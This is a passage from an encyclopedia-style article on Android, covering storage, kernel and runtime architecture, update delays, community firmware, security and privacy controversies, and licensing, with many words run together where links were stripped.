Microsoft announced deprecation of WSA with support ending on March 5, 2025.[129] The storage of Android devices can be expanded using secondary devices such asSD cards. Android recognizes two types of secondary storage:portablestorage (which is used by default), andadoptablestorage. Portable storage is treated as an external storage device. Adoptable storage, introduced on Android 6.0, allows the internal storage of the device to bespannedwith the SD card, treating it as an extension of the internal storage. This has the disadvantage of preventing the memory card from being used with another device unless it isreformatted.[130] Android 4.4 introduced the Storage Access Framework (SAF), a set of APIs for accessing files on the device's filesystem.[131]As of Android 11, Android has required apps to conform to a data privacy policy known asscoped storage, under which apps may only automatically have access to certain directories (such as those for pictures, music, and video), and app-specific directories they have created themselves. Apps are required to use the SAF to access any other part of the filesystem.[132][133][134] Since Android devices are usually battery-powered, Android is designed to manage processes to keep power consumption at a minimum. When an application is not in use the systemsuspends its operationso that, while available for immediate use rather than closed, it does not use battery power or CPU resources.[135][136]Android manages the applications stored in memory automatically: when memory is low, the system will begin invisibly and automatically closing inactive processes, starting with those that have been inactive for the longest amount of time.[137][138]Lifehacker reported in 2011 that third-party task-killer applications were doing more harm than good.[139] Some settings for use bydevelopersfordebuggingandpower usersare located in a "Developer options" sub menu, such as the ability to highlight updating parts of the display, show an overlay with the current status of the touch screen, show touching spots for possible use inscreencasting, notify the user of unresponsive background processes with the option to end them ("Show all ANRs", i.e. "App's Not Responding"), prevent a Bluetooth audio client from controlling the system volume ("Disable absolute volume"), and adjust the duration of transition animations or deactivate them completely to speed up navigation.[140][141][142] Developer options are initially hidden since Android 4.2 "Jelly Bean", but can be enabled by actuating the operating system's build number in the device information seven times. Hiding developers options again requires deleting user data for the "Settings" app, possibly resetting some other preferences, or in recent Android versions, turning off the Developer options master switch.[143][144][145] The main hardware platform for Android isARM(i.e. the 64-bitARMv8-Aarchitecture and previously 32-bit such asARMv7), andx86andx86-64architectures were once also officially supported in later versions of Android.[146][147][148]The unofficialAndroid-x86project provided support for x86 architectures ahead of the official support.[149][150]Since 2012, Android devices withIntelprocessors began to appear, including phones[151]and tablets. While gaining support for 64-bit platforms, Android was first made to run on 64-bit x86 and then onARM64. An unofficial experimental port of the operating system to theRISC-Varchitecture was released in 2021.[152] Requirements for the minimum amount ofRAMfor devices running Android 7.1 range from in practice 2 GB for best hardware, down to 1 GB for the most common screen. Android supports all versions of OpenGL ES andVulkan(and version 1.1 available for some devices[153]). Android devices incorporate many optional hardware components, including still or video cameras,GPS,orientation sensors, dedicated gaming controls, accelerometers, gyroscopes, barometers,magnetometers, proximity sensors,pressure sensors, thermometers, andtouchscreens. Some hardware components are not required, but became standard in certain classes of devices, such as smartphones, and additional requirements apply if they are present. Some other hardware was initially required, but those requirements have been relaxed or eliminated altogether. For example, as Android was developed initially as a phone OS, hardware such as microphones were required, while over time the phone function became optional.[122]Android used to require anautofocuscamera, which was relaxed to afixed-focuscamera[122]if present at all, since the camera was dropped as a requirement entirely when Android started to be used onset-top boxes. In addition to running on smartphones and tablets, several vendors run Android natively on regular PC hardware with a keyboard and mouse.[154][155][156][157]In addition to their availability on commercially available hardware, similar PC hardware-friendly versions of Android are freely available from the Android-x86 project, including customized Android 4.4.[158]Using the Android emulator that is part of theAndroid SDK, or third-party emulators, Android can also run non-natively on x86 architectures.[159][160]Chinese companies are building a PC and mobile operating system, based on Android, to "compete directly with Microsoft Windows and Google Android".[161]The Chinese Academy of Engineering noted that "more than a dozen" companies were customizing Android following a Chinese ban on the use of Windows 8 on government PCs.[162][163][164] Android is developed by Google until the latest changes and updates are ready to be released, at which point thesource codeis made available to the Android Open Source Project (AOSP),[165]an open source initiative led by Google.[166]The first source code release happened as part of the initial release in 2007. All releases are under theApache License.[167] The AOSP code can be found with minimal modifications on select devices, mainly the former Nexus and current Android One series of devices.[168]However, most original equipment manufacturers (OEMs) customize the source code to run on their hardware.[169][170] Android's source code does not contain thedevice drivers, often proprietary, that are needed for certain hardware components,[171]and does not contain the source code ofGoogle Play Services, which many apps depend on. As a result, most Android devices, including Google's own, ship with a combination offree and open sourceandproprietarysoftware, with the software required for accessing Google services falling into the latter category.[citation needed]In response to this, there are some projects that build complete operating systems based on AOSP as free software, the first beingCyanogenMod(see sectionOpen-source communitybelow). Google provides annual[172]Android releases, both for factory installation in new devices, and forover-the-airupdates to existing devices.[173]The latest major release isAndroid 15. The extensive variation ofhardware[174]in Android devices has caused significant delays for software upgrades andsecurity patches. Each upgrade has had to be specifically tailored, a time- and resource-consuming process.[175]Except for devices within the Google Nexus and Pixel brands, updates have often arrived months after the release of the new version, or not at all.[176]Manufacturers often prioritize their newest devices and leave old ones behind.[177]Additional delays can be introduced by wireless carriers who, after receiving updates from manufacturers, further customize Android to their needs and conduct extensive testing on their networks before sending out the upgrade.[177][178]There are also situations in which upgrades are impossible due to a manufacturer not updating necessarydrivers.[179] The lack of after-sale support from manufacturers and carriers has been widely criticized by consumer groups and the technology media.[180][181][182]Some commentators have noted that the industry has a financial incentive not to upgrade their devices, as the lack of updates for existing devices fuels the purchase of newer ones,[183]an attitude described as "insulting".[182]The Guardiancomplained that the method of distribution for updates is complicated only because manufacturers and carriers have designed it that way.[182]In 2011, Google partnered with a number of industry players to announce an "Android Update Alliance", pledging to deliver timely updates for every device for 18 months after its release; however, there has not been another official word about that alliance since its announcement.[177][184] In 2012, Google began de-coupling certain aspects of the operating system (particularly its central applications) so they could be updated through theGoogle Playstore independently of the OS. One of those components,Google Play Services, is aclosed-sourcesystem-level process providingAPIsfor Google services, installed automatically on nearly all devices runningAndroid 2.2 "Froyo"and higher. With these changes, Google can add new system functions and update apps without having to distribute an upgrade to the operating system itself.[185]As a result,Android 4.2 and 4.3 "Jelly Bean"contained relatively fewer user-facing changes, focusing more on minor changes and platform improvements.[186] HTC's then-executive Jason Mackenzie called monthly security updates "unrealistic" in 2015, and Google was trying to persuade carriers to exclude security patches from the full testing procedures. In May 2016,Bloomberg Businessweekreported that Google was making efforts to keep Android more up-to-date, including accelerated rates of security updates, rolling out technological workarounds, reducing requirements for phone testing, and ranking phone makers in an attempt to "shame" them into better behavior. As stated byBloomberg: "As smartphones get more capable, complex and hackable, having the latest software work closely with the hardware is increasingly important". Hiroshi Lockheimer, the Android lead, admitted that "It's not an ideal situation", further commenting that the lack of updates is "the weakest link on security on Android". Wireless carriers were described in the report as the "most challenging discussions", due to their slow approval time while testing on their networks, despite some carriers, includingVerizon WirelessandSprint Corporation, already shortening their approval times. In a further effort for persuasion, Google shared a list of top phone makers measured by updated devices with its Android partners, and is considering making the list public.[when?]Mike Chan, co-founder of phone maker Nextbit and former Android developer, said that "The best way to solve this problem is a massive re-architecture of the operating system", "or Google could invest in training manufacturers and carriers 'to be good Android citizens'".[187][188][189] In May 2017, with the announcement ofAndroid 8.0, Google introduced Project Treble, a major re-architect of the Android OS framework designed to make it easier, faster, and less costly for manufacturers to update devices to newer versions of Android. Project Treble separates the vendor implementation (device-specific, lower-level software written by silicon manufacturers) from the Android OS framework via a new "vendor interface". In Android 7.0 and earlier, no formal vendor interface exists, so device makers must update large portions of the Android code to move a device to a newer version of the operating system. With Treble, the new stable vendor interface provides access to the hardware-specific parts of Android, enabling device makers to deliver new Android releases simply by updating the Android OS framework, "without any additional work required from the silicon manufacturers."[190] In September 2017, Google's Project Treble team revealed that, as part of their efforts to improve the security lifecycle of Android devices, Google had managed to get the Linux Foundation to agree to extend the support lifecycle of the Linux Long-Term Support (LTS) kernel branch from the 2 years that it has historically lasted to 6 years for future versions of the LTS kernel, starting with Linux kernel 4.4.[191] In May 2019, with the announcement ofAndroid 10, Google introduced Project Mainline to simplify and expedite delivery of updates to the Android ecosystem. Project Mainline enables updates to core OS components through the Google Play Store. As a result, important security and performance improvements that previously needed to be part of full OS updates can be downloaded and installed as easily as an app update.[192] Google reported rolling out new amendments in Android 12 aimed at making the use of third-party application stores easier. This announcement rectified the concerns reported regarding the development of Android apps, including a fight over an alternative in-app payment system and difficulties faced by businesses moving online because ofCOVID-19.[193] Android'skernelis based on theLinux kernel'slong-term support(LTS) branches. As of 2024[update], Android (14) uses versions 6.1 or 5.15 (for "Feature kernels", can be older for "Launch kernels", e.g. android12-5.10, android11-5.4, depending on Android version down to e.g. android11-5.4, android-4.14-stable, android-4.9-q), and older Android versions, use version 5.15 or a number of older kernels.[194]The actual kernel depends on the individual device.[195] Android's variant of the Linux kernel has further architectural changes that are implemented by Google outside the typical Linux kernel development cycle, such as the inclusion of components like device trees, ashmem, ION, and differentout of memory(OOM) handling.[196][197]Certain features that Google contributed back to the Linux kernel, notably a power management feature called "wakelocks",[198]were initially rejected bymainline kerneldevelopers partly because they felt that Google did not show any intent to maintain its own code.[199][200]Google announced in April 2010 that they would hire two employees to work with the Linux kernel community,[201]butGreg Kroah-Hartman, the current Linux kernel maintainer for the stable branch, said in December 2010 that he was concerned that Google was no longer trying to get their code changes included in mainstream Linux.[200]Google engineer Patrick Brady once stated in the company's developer conference that "Android is not Linux",[202]withComputerworldadding that "Let me make it simple for you, without Linux, there is no Android".[203]Ars Technicawrote that "Although Android is built on top of the Linux kernel, the platform has very little in common with the conventional desktop Linux stack".[202] In August 2011,Linus Torvaldssaid that "eventually Android and Linux would come back to a common kernel, but it will probably not be for four to five years".[204](that has not happened yet, while some code has beenupstreamed, not all of it has, so modified kernels keep being used). In December 2011, Greg Kroah-Hartman announced the start of Android Mainlining Project, which aims to put some Androiddrivers, patches and features back into the Linux kernel, starting in Linux 3.3.[205]Linux included the autosleep and wakelocks capabilities in the 3.5 kernel, after many previous attempts at a merger. The interfaces are the same but the upstream Linux implementation allows for two different suspend modes: to memory (the traditional suspend that Android uses), and to disk (hibernate, as it is known on the desktop).[206]Google maintains a public code repository that contains their experimental work tore-baseAndroid off the latest stable Linux versions.[207][208] Android is aLinux distributionaccording to theLinux Foundation,[209]Google's open-source chiefChris DiBona,[210]and several journalists.[211][212]Others, such as Google engineer Patrick Brady, say that Android is not Linux in the traditionalUnix-likeLinux distribution sense; Android does not include theGNU C Library(it usesBionicas an alternative C library) and some other components typically found in Linux distributions.[213] With the release ofAndroid Oreoin 2017, Google began to require that devices shipped with newSoCshad Linux kernel version 4.4 or newer, for security reasons. Existing devices upgraded to Oreo, and new products launched with older SoCs, were exempt from this rule.[214][215] Theflash storageon Android devices is split into several partitions, such as/system/for the operating system itself, and/data/for user data and application installations.[216] In contrast to typicaldesktop Linuxdistributions, Android device owners are not givenrootaccess to the operating system and sensitive partitions such as/system/are partiallyread-only. However,root accesscan be obtained by exploitingsecurity flawsin Android, which is used frequently by theopen-source communityto enhance the capabilities and customizability of their devices, but also by malicious parties to installvirusesandmalware.[217]Root access can also be obtained byunlocking the bootloaderwhich is available on most Android devices, for example on mostGoogle Pixel,OnePlusandNothingmodelsOEM Unlockingoption in the developer settings allows the user to unlock the bootloader withFastboot, afterward, custom software may be installed. Some OEMs have their own methods. The unlocking processresets the system to factory state, erasing all user data.[218]Proprietary frameworks likeSamsung Knoxlimit or block attempts at rooting. Google'sPlay Integrity APIallows developers to check for any signs of tampering,[219]although the fairness of the tests have been criticized.[220] On top of the Linux kernel, there are themiddleware,librariesandAPIswritten inC, andapplication softwarerunning on anapplication frameworkwhich includesJava-compatible libraries. Development of the Linux kernel continues independently of Android's other source code projects. Android usesAndroid Runtime(ART) as its runtime environment (introduced in version 4.4), which usesahead-of-time (AOT) compilationto entirely compile the application bytecode intomachine codeupon the installation of an application. In Android 4.4, ART was an experimental feature and not enabled by default; it became the only runtime option in the next major version of Android, 5.0.[221]In versions no longer supported, until version 5.0 when ART took over, Android previously usedDalvikas aprocess virtual machinewithtrace-based just-in-time (JIT) compilationto run Dalvik "dex-code" (Dalvik Executable), which is usually translated from theJava bytecode. Following the trace-based JIT principle, in addition tointerpretingthe majority of application code, Dalvik performs the compilation andnative executionof select frequently executed code segments ("traces") each time an application is launched.[222][223][224]For its Java library, the Android platform uses a subset of the now discontinuedApache Harmonyproject.[225]In December 2015, Google announced that the next version of Android would switch to a Java implementation based on theOpenJDKproject.[226] Android'sstandard C library,Bionic, was developed by Google specifically for Android, as a derivation of theBSD's standard C library code. Bionic itself has been designed with several major features specific to the Linux kernel. The main benefits of using Bionic instead of theGNU C Library(glibc) oruClibcare its smaller runtime footprint, and optimization for low-frequency CPUs. At the same time, Bionic is licensed under the terms of theBSD licence, which Google finds more suitable for the Android's overall licensing model.[224] Aiming for a different licensing model, toward the end of 2012, Google switched the Bluetooth stack in Android from the GPL-licensedBlueZto the Apache-licensed BlueDroid.[227]A new Bluetooth stack, called Gabeldorsche, was developed to try to fix the bugs in the BlueDroid implementation.[228] Android does not have a nativeX Window Systemby default, nor does it support the full set of standardGNUlibraries. This made it difficult to port existing Linux applications or libraries to Android,[213]until version r5 of theAndroid Native Development Kitbrought support for applications written completely inCorC++.[229]Libraries written in C may also be used in applications by injection of a smallshimand usage of theJNI.[230] In current versions of Android, "Toybox", a collection of command-line utilities (mostly for use by apps, as Android does not provide acommand-line interfaceby default), is used (since the release of Marshmallow) replacing a similar "Toolbox" collection found in previous Android versions.[231] Android has another operating system, Trusty OS, within it, as a part of "Trusty" "software components supporting a Trusted Execution Environment (TEE) on mobile devices." "Trusty and the Trusty API are subject to change. [..] Applications for the Trusty OS can be written in C/C++ (C++ support is limited), and they have access to a small C library. [..] All Trusty applications are single-threaded; multithreading in Trusty userspace currently is unsupported. [..] Third-party application development is not supported in" the current version, and software running on the OS and processor for it, run the "DRMframework for protected content. [..] There are many other uses for a TEE such as mobile payments, secure banking, full-disk encryption, multi-factor authentication, device reset protection, replay-protected persistent storage, wireless display ("cast") of protected content, secure PIN and fingerprint processing, and even malware detection."[232] Android'ssource codeis released by Google under anopen-source license, and its open nature has encouraged a large community of developers and enthusiasts to use the open-source code as a foundation for community-driven projects, which deliver updates to older devices, add new features for advanced users or bring Android to devices originally shipped with other operating systems.[233]These community-developed releases often bring new features and updates to devices faster than through the official manufacturer/carrier channels, with a comparable level of quality;[234]provide continued support for older devices that no longer receive official updates; or bring Android to devices that were officially released running other operating systems, such as theHP TouchPad. Community releases often come pre-rootedand contain modifications not provided by the original vendor, such as the ability tooverclockorover/undervoltthe device's processor,[235]or security enhancements beyond what is included in the stock OS.[236] CyanogenModwas the most widely used community firmware;[237]after its abrupt discontinuation in 2016, a communityforkknown asLineageOSwas established as a spiritual continuation of the project.[238] Historically, device manufacturers and mobile carriers have typically been unsupportive of third-partyfirmwaredevelopment. Manufacturers express concern about improper functioning of devices running unofficial software and the support costs resulting from this.[239]Moreover, modified firmware such as CyanogenMod sometimes offer features, such astethering, for which carriers would otherwise charge a premium. As a result, technical obstacles including lockedbootloadersand restricted access to root permissions are common in many devices. However, as community-developed software has grown more popular, and following a statement by theLibrarian of Congressin theUnited Statesthat permits the "jailbreaking" of mobile devices,[240]manufacturers and carriers have softened their position regarding third party development, with some, includingHTC,[239]Motorola,[241]Samsung[242][243]andSony,[244]providing support and encouraging development. As a result of this, over time the need to circumvent hardware restrictions to install unofficial firmware has lessened as an increasing number of devices are shipped with unlocked or unlockablebootloaders, similar toNexusseries of phones, although usually requiring that users waive their devices' warranties to do so.[239]However, despite manufacturer acceptance, some carriers in the US still require that phones are locked down.[245] Internally, Android identifies each supported device by itsdevice codename, a short string,[246]which may or may not be similar to the model name used in marketing the device. For example, the device codename of thePixel smartphoneissailfish. The device codename is usually not visible to the end user, but is important for determining compatibility with modified Android versions. It is sometimes also mentioned in articles discussing a device, because it allows to distinguish different hardware variants of a device, even if the manufacturer offers them under the same name. The device codename is available to running applications underandroid.os.Build.DEVICE.[247] In 2020, Google launched the Android Partner Vulnerability Initiative to improve the security of Android.[248][249]They also formed an Android security team.[250] Research from security companyTrend Microlists premium service abuse as the most common type of Android malware, where text messages are sent from infected phones topremium-rate telephone numberswithout the consent or even knowledge of the user. Other malware displays unwanted and intrusive advertisements on the device, or sends personal information to unauthorised third parties.[251]Security threats on Android are reportedly growing exponentially; however, Google engineers have argued that the malware and virus threat on Android is beingexaggeratedby security companies for commercial reasons,[252][253]and have accused the security industry of playing on fears to sell virus protection software to users.[252]Google maintains that dangerous malware is actually extremely rare,[253]and a survey conducted byF-Secureshowed that only 0.5% of Android malware reported had come from the Google Play store.[254] In 2021, journalists and researchers reported the discovery ofspyware, calledPegasus, developed and distributed by a private company which can and has been used to infect bothiOSand Android smartphones often – partly via use of0-day exploits– without the need for any user-interaction or significant clues to the user and then be used to exfiltrate data, track user locations, capture film through its camera, and activate the microphone at any time.[255]Analysisof data trafficby popular smartphones running variants of Android found substantial by-default data collection and sharing with no opt-out by thispre-installed software.[256][257]Both of these issues are not addressed or cannot be addressed by security patches. As part of the broader2013 mass surveillance disclosuresit was revealed in September 2013 that the American and British intelligence agencies, theNational Security Agency(NSA) andGovernment Communications Headquarters(GCHQ), respectively, have access to the user data on iPhone, BlackBerry, and Android devices. They were reportedly able to read almost all smartphone information, including SMS, location, emails, and notes.[258]In January 2014, further reports revealed the intelligence agencies' capabilities to intercept the personal information transmitted across the Internet by social networks and other popular applications such asAngry Birds, which collect personal information of their users for advertising and other commercial reasons. GCHQ has, according toThe Guardian, awiki-style guide of different apps and advertising networks, and the different data that can be siphoned from each.[259]Later that week, the Finnish Angry Birds developerRovioannounced that it was reconsidering its relationships with its advertising platforms in the light of these revelations, and called upon the wider industry to do the same.[260] The documents revealed a further effort by the intelligence agencies to intercept Google Maps searches and queries submitted from Android and other smartphones to collect location information in bulk.[259]The NSA and GCHQ insist their activities comply with all relevant domestic and international laws, although the Guardian stated "the latest disclosures could also add to mounting public concern about how the technology sector collects and uses information, especially for those outside the US, who enjoy fewer privacy protections than Americans."[259] Leaked documents codenamedVault 7and dated from 2013 to 2016, detail the capabilities of theCentral Intelligence Agency(CIA) to perform electronic surveillance andcyber warfare, including the ability to compromise the operating systems of most smartphones (including Android).[261][262] In August 2015, Google announced that devices in theGoogle Nexusseries would begin to receive monthly securitypatches. Google also wrote that "Nexus devices will continue to receive major updates for at least two years and security patches for the longer of three years from initial availability or 18 months from last sale of the device via theGoogle Store."[263][264][265]The following October, researchers at theUniversity of Cambridgeconcluded that 87.7% of Android phones in use had known but unpatchedsecurity vulnerabilitiesdue to lack of updates and support.[266][267][268]Ron Amadeo ofArs Technicawrote also in August 2015 that "Android was originally designed, above all else, to be widely adopted. Google was starting from scratch with zero percent market share, so it was happy to give up control and give everyone a seat at the table in exchange for adoption. [...] Now, though, Android has around 75–80 percent of the worldwide smartphone market—making it not just the world's most popular mobile operating system but arguably the most popular operating system, period. As such, security has become a big issue. Android still uses a software update chain-of-command designed back when the Android ecosystem had zero devices to update, and it just doesn't work".[269]Following news of Google's monthly schedule, some manufacturers, including Samsung and LG, promised to issue monthly security updates,[270]but, as noted by Jerry Hildenbrand inAndroid Centralin February 2016, "instead we got a few updates on specific versions of a small handful of models. And a bunch of broken promises".[271] In a March 2017 post on Google's Security Blog, Android security leads Adrian Ludwig and Mel Miller wrote that "More than 735 million devices from 200+ manufacturers received a platform security update in 2016" and that "Our carrier and hardware partners helped expand deployment of these updates, releasing updates for over half of the top 50 devices worldwide in the last quarter of 2016". They also wrote that "About half of devices in use at the end of 2016 had not received a platform security update in the previous year", stating that their work would continue to focus on streamlining the security updates program for easier deployment by manufacturers.[272]Furthermore, in a comment toTechCrunch, Ludwig stated that the wait time for security updates had been reduced from "six to nine weeks down to just a few days", with 78% of flagship devices in North America being up-to-date on security at the end of 2016.[273] Patches to bugs found in the core operating system often do not reach users of older and lower-priced devices.[274][275]However, the open-source nature of Android allows security contractors to take existing devices and adapt them for highly secure uses. For example, Samsung has worked with General Dynamics through theirOpen Kernel Labsacquisition to rebuildJelly Beanon top of their hardened microvisor for the "Knox" project.[276][277] Android smartphones have the ability to report the location ofWi-Fiaccess points, encountered as phone users move around, to build databases containing the physical locations of hundreds of millions of such access points. These databases form electronic maps to locate smartphones, allowing them to run apps likeFoursquare,Google Latitude,Facebook Places, and to deliver location-based ads.[278]Third party monitoring software such as TaintDroid,[279]an academic research-funded project, can, in some cases, detect when personal information is being sent from applications to remote servers.[280] In 2018, Norwegian security firm Promon has unearthed a serious Android security hole which can be exploited to steal login credentials, access messages, and track location, which could be found in all versions of Android, includingAndroid 10. The vulnerability came by exploiting a bug in the multitasking system enabling a malicious app to overlay legitimate apps with fake login screens that users are not aware of when handing in security credentials. Users can also be tricked into granting additional permissions to the malicious apps, which later enable them to perform various nefarious activities, including intercepting texts or calls and stealing banking credentials.[281]AvastThreat Labsalso discovered that many pre-installed apps on several hundred new Android devices contain dangerous malware andadware. Some of the preinstalled malware can commit ad fraud or even take over its host device.[282][283] In 2020, the Which? watchdog reported that more than a billion Android devices released in 2012 or earlier, which was 40% of Android devices worldwide, were at risk of being hacked. This conclusion stemmed from the fact that no security updates were issued for the Android versions below 7.0 in 2019. Which? collaborated with the AV Comparatives anti-virus lab to infect five phone models with malware, and it succeeded in each case. Google refused to comment on the watchdog's speculations.[284] On August 5, 2020,Twitterpublished a blog urging its users to update their applications to the latest version with regards to a security concern that allowed others to access direct messages. A hacker could easily use the "Android system permissions" to fetch the account credentials in order to do so. The security issue is only with Android 8 (Android Oreo) and Android 9 (Android Pie). Twitter confirmed that updating the app will restrict such practices.[285] Android applications run in asandbox, an isolated area of the system that does not have access to the rest of the system's resources, unless access permissions are explicitly granted by the user when the application is installed, however this may not be possible for pre-installed apps. It is not possible, for example, to turn off the microphone access of the pre-installed camera app without disabling the camera completely. This is valid also in Android versions 7 and 8.[286] Since February 2012, Google has used itsGoogle Bouncermalware scanner to watch over and scan apps available in the Google Play store.[287][288]A "Verify Apps" feature was introduced in November 2012, as part of theAndroid 4.2 "Jelly Bean"operating system version, to scan all apps, both from Google Play and from third-party sources, for malicious behaviour.[289]Originally only doing so during installation, Verify Apps received an update in 2014 to "constantly" scan apps, and in 2017 the feature was made visible to users through a menu in Settings.[290][291] In former Android versions, before installing an application, theGoogle Playstore displayed a list of the requirements an app needs to function. After reviewing these permissions, the user could choose to accept or refuse them, installing the application only if they accepted.[292]InAndroid 6.0 "Marshmallow", the permissions system was changed; apps are no longer automatically granted all of their specified permissions at installation time. An opt-in system is used instead, in which users are prompted to grant or deny individual permissions to an app when they are needed for the first time. Applications remember the grants, which can be revoked by the user at any time. Pre-installed apps, however, are not always part of this approach. In some cases it may not be possible to deny certain permissions to pre-installed apps, nor be possible to disable them. TheGoogle Play Servicesapp cannot be uninstalled, nor disabled. Any force stop attempt, result in the app restarting itself.[293][294]The new permissions model is used only by applications developed for Marshmallow using itssoftware development kit(SDK), and older apps will continue to use the previous all-or-nothing approach. Permissions can still be revoked for those apps, though this might prevent them from working properly, and a warning is displayed to that effect.[295][296] In September 2014, Jason Nova ofAndroid Authorityreported on a study by the German security company Fraunhofer AISEC inantivirus softwareand malware threats on Android. Nova wrote that "The Android operating system deals with software packages by sandboxing them; this does not allow applications to list the directory contents of other apps to keep the system safe. By not allowing the antivirus to list the directories of other apps after installation, applications that show no inherent suspicious behavior when downloaded are cleared as safe. If then later on parts of the app are activated that turn out to be malicious, the antivirus will have no way to know since it is inside the app and out of the antivirus' jurisdiction". The study by Fraunhofer AISEC, examining antivirus software fromAvast,AVG,Bitdefender,ESET,F-Secure,Kaspersky,Lookout,McAfee(formerly Intel Security),Norton,Sophos, andTrend Micro, revealed that "the tested antivirus apps do not provide protection against customized malware or targeted attacks", and that "the tested antivirus apps were also not able to detect malware which is completely unknown to date but does not make any efforts to hide its malignity".[297] In August 2013, Google announced Android Device Manager (renamed Find My Device in May 2017),[298][299]a service that allows users to remotely track, locate, and wipe their Android device,[300][301]with an Android app for the service released in December.[302][303]In December 2016, Google introduced a Trusted Contacts app, letting users request location-tracking of loved ones during emergencies.[304][305]In 2020, Trusted Contacts was shut down and the location-sharing feature rolled into Google Maps.[306] On October 8, 2018, Google announced new Google Play store requirements to combat over-sharing of potentially sensitive information, including call and text logs. The issue stems from the fact that many apps request permissions to access users' personal information (even if this information is not needed for the app to function) and some users unquestionably grant these permissions. Alternatively, a permission might be listed in the app manifest as required (as opposed to optional) and the app would not install unless user grants the permission; users can withdraw any, even required, permissions from any app in the device settings after app installation, but few users do this. Google promised to work with developers and create exceptions if their apps require Phone or SMS permissions for "core app functionality". The new policies enforcement started on January 6, 2019, 90 days after policy announcement on October 8, 2018. Furthermore, Google announced a new "target API level requirement" (targetSdkVersionin manifest) at least Android 8.0 (API level 26) for all new apps and app updates. The API level requirement might combat the practice of app developers bypassing some permission screens by specifying early Android versions that had a coarser permission model.[307][308] The Android Open Source Project implements averified bootchain with intentions toverifythat executed code, such as thekernelorbootloader, comes from an official source instead of a malicious actor. This implementation establishes a full chain of trust, as it initially starts at a hardware level. Subsequently, the boot loader is verified and system partitions such assystemandvendorare checked forintegrity.[309][310] Furthermore, this process verifies that a previous version of Android has not been installed. This effectively provides rollback protection, which mitigates exploits that are similar to adowngrade attack.[309] Android (all supported versions, as far back as version 4.4 of the Android Open Source Project) has the option to provide averified bootchain withdm-verity. This is a feature in theLinux kernelthat allows for transparent integrity checking ofblock devices.[311][312] This feature is designed to mitigate persistentrootkits. Dependence on proprietaryGoogle Play Servicesand customizations added on top of the operating system by vendors who license Android from Google is causing privacy concerns.[clarification needed][313][314][315] In 2019,Googlewas fined €50 Million by the FrenchCNILfor a lack of information regarding their users.[316] Two years later, in 2021,researcherDouglas Leith, using a sort of data interception, showed that several data are sent from Android device toGoogle's servers, even when the phone is sleeping (IDLE) with noGoogleaccount registered into it.[317]SeveralGoogleapplicationssend data, such asChrome,MessageorDocs, howeverYoutubeis the only one to add a unique identifier data.[318] In 2022, Leith showed that an Androidphonesent various data related to communications, includingphoneandtext messagesto Google.Timestamp, sender and receiver, plus several other data, are sent toGoogle Play Servicesinfrastructure, even if the "Usage and Diag" feature is disabled. Those data are marked with a Unique Identifier of an Android device, and don't comply withGDPR.[319] Google was sanctioned aboutA$60 Million (approx 40MillionUSD) inAustraliafor having misled its Android customers. It concerns the 2017–2018 period where the issue regarding misleading location tracking settings was discovered, and the case came under Australia’s Competition & Consumer Commission responsibility. The trial concluded in 2021 when the court decided Google brokeConsumer lawfor about 1.3 million of Google account owners.[320] A similar case to the 2019 French case regarding location tracking, was brought in the U.S. in a privacy lawsuit filed by a coalition of attorneys general from 40 U.S. states. A penalty ofUSD391 Million was agreed between Google and theDoJ.[321]The New York Timesreleased at that time a long-terminvestigationabout thoseprivacyconcerns.[322] Android devices, particularly low-end and mid-range models, have been criticized for their short software support lifespans.[323]Starting in the 2010s, many users found that their devices received only one or two major updates and a limited number of security patches. This lack of long-term support stemmed from manufacturers’ unwillingness to invest in costly software upgrades,[324]which were often tied to contractual agreements with chipset suppliers likeQualcomm. As a result, Android developed a reputation for rapid device obsolescence.[325][326] To address this concern, Google introducedProject Treble, a framework designed to streamline the development and deployment of Android updates viaGoogle Play Services, reducing manufacturers’ involvement in the update process. However, for many devices, significant improvements were still limited by the chipset manufacturers.Fairphone, a company focused on sustainability, explained that its inability to extend software support was due to Qualcomm’s policies rather than its own.[327]Appleexecutives also highlighted Android’s fragmented update ecosystem in their critiques of the platform, while quietly admitting that Qualcomm had also made it difficult for them to offer updates to the iPhone.[328] In response problem, several community-driven initiatives emerged to provide alternatives operating systems for unsupported devices including, likeLineageOS,Sailfish OS,Ubuntu TouchandPostmarketOS.[329] Starting in 2022, Samsung, the largest Android smartphone manufacturer, announced extended software support from previous two years, first to four years, followed by five years in 2023 and six years in 2024.[330] Shortly thereafter, Qualcomm followed suit, offering extending support timelines for OEM building phones with its chipsets, first to seven years in 2024,[331]followed by eight years in 2025. However, the support commitment was only for its most powerful chipsets, and did not make a similar commitment for chipsets used in low-end and mid-range phones.[332] These changes bring Samsung and potentially some Qualcomm-powered devices closer to competing platforms, such as Apple, whose iPhones have received four to eight years of support.[333] Thesource codefor Android isopen-source: it is developed in private by Google, with the source code released publicly when a new version of Android is released. Google publishes most of the code (including network and telephonystacks) under thenon-copyleftApache Licenseversion 2.0. which allows modification and redistribution.[334][335]The license does not grant rights to the "Android" trademark, so device manufacturers and wireless carriers have to license it from Google under individual contracts. Associated Linux kernel changes are released under thecopyleftGNU General Public Licenseversion 2, developed by theOpen Handset Alliance, with the source code publicly available at all times.[336]The only Android release which was not immediately made available as source code was the tablet-only 3.0Honeycombrelease. The reason, according toAndy Rubinin an official Android blog post, was becauseHoneycombwas rushed for production of theMotorola Xoom,[337]and they did not want third parties creating a "really bad user experience" by attempting to put onto smartphones a version of Android intended for tablets.[338] Only the base Android operating system (including some applications) is open-source software, whereas most Android devices ship with a substantial amount of proprietary software, such asGoogle Mobile Services, which includes applications such asGoogle Play Store, Google Search, andGoogle Play Services– a software layer that providesAPIsfor the integration with Google-provided services, among others. These applications must be licensed from Google by device makers, and can only be shipped on devices which meet its compatibility guidelines and other requirements.[118]Custom, certified distributions of Android produced by manufacturers (such asSamsung Experience) may also replace certain stock Android apps with their own proprietary variants and add additional software not included in the stock Android operating system.[117]With the advent of theGoogle Pixelline of devices, Google itself has also made specific Android features timed or permanent exclusives to the Pixel series.[339][340]There may also be "binary blob"driversrequired for certain hardware components in the device.[117][171]The best known fully open source Android services are theLineageOSdistribution andMicroGwhich acts as an open source replacement of Google Play Services. Richard Stallmanand theFree Software Foundationhave been critical of Android and have recommended the usage of alternatives such asReplicant, because drivers and firmware vital for the proper functioning of Android devices are usually proprietary, and because the Google Play Store application can forcibly install or uninstall applications and, as a result, invite non-free software. In both cases, the use of closed-source software causes the system to become vulnerable tobackdoors.[341][342] It has been argued that because developers are often required to purchase the Google-branded Android license, this has turned the theoretically open system into afreemiumservice.[343]: 20 Google licenses their Google Mobile Services software, along with the Android trademarks, only to hardware manufacturers for devices that meet Google's compatibility standards specified in the Android Compatibility Program document.[344]Thus, forks of Android that make major changes to the operating system itself do not include any of Google's non-free components, stay incompatible with applications that require 